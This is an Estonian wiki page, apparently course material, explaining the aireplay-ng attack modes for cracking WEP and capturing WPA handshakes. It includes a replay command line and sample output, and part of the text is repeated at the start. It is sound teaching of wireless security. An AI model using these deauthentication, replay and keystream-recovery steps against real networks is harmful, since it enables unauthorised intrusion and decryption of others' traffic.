Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T08:49:04Z

Tliiv: /* Open Authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg]][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile random baidiarray(pusle).[6]
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendab võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]